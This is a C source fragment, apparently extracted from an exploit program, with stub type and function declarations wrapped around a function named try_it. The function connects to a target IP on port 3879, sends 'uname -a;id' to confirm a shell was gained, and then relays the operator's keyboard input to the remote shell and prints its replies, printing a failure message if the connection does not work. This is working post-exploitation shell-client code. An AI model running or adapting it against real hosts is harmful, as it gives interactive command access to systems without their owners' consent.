
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct TYPE_2__ {int s_addr; } ;
struct sockaddr_in {int sin_family; int sin_port; TYPE_1__ sin_addr; } ;
struct sock_addr {int dummy; } ;
typedef int sk ;
typedef int fd_set ;


 int AF_INET ;
 scalar_t__ FD_ISSET (int,int *) ;
 int FD_SET (int,int *) ;
 int FD_ZERO (int *) ;
 int SOCK_STREAM ;
 int connect (int,struct sock_addr*,int) ;
 int exit (int ) ;
 int fgets (char*,int,int ) ;
 int htons (int) ;
 int ip ;
 int memset (char*,int ,int) ;
 int printf (char*,...) ;
 int recv (int,char*,int,int ) ;
 int select (int,int *,int *,int *,int *) ;
 int send (int,char*,int ,int ) ;
 int socket (int ,int ,int ) ;
 int stdin ;
 int strcpy (char*,char*) ;
 int strlen (char*) ;

void try_it(){
   struct sockaddr_in sk;
   int s;
   char buff[1000];
   fd_set fs;

   printf("trying!\n");
   sk.sin_addr.s_addr=ip;
   sk.sin_port=htons(3879);
   sk.sin_family=AF_INET;
   s=socket(AF_INET,SOCK_STREAM,0);
   if(connect(s,(struct sock_addr*)&sk,sizeof(sk))==-1){
      printf("sorry.. it did'nt worked\n");
      exit(0);
   }
   strcpy(buff,"uname -a;id\n");
   send(s,buff,strlen(buff),0);
   while(1){
      memset(buff,0,1000);
      FD_ZERO(&fs);
      FD_SET(0,&fs);
      FD_SET(s,&fs);
      select(s+1,&fs,((void*)0),((void*)0),((void*)0));
      if(FD_ISSET(0,&fs)){
         fgets(buff,1000,stdin);
         send(s,buff,strlen(buff),0);
      }
      if(FD_ISSET(s,&fs)){
         recv(s,buff,1000,0);
         printf("%s",buff);
      }
   }

}
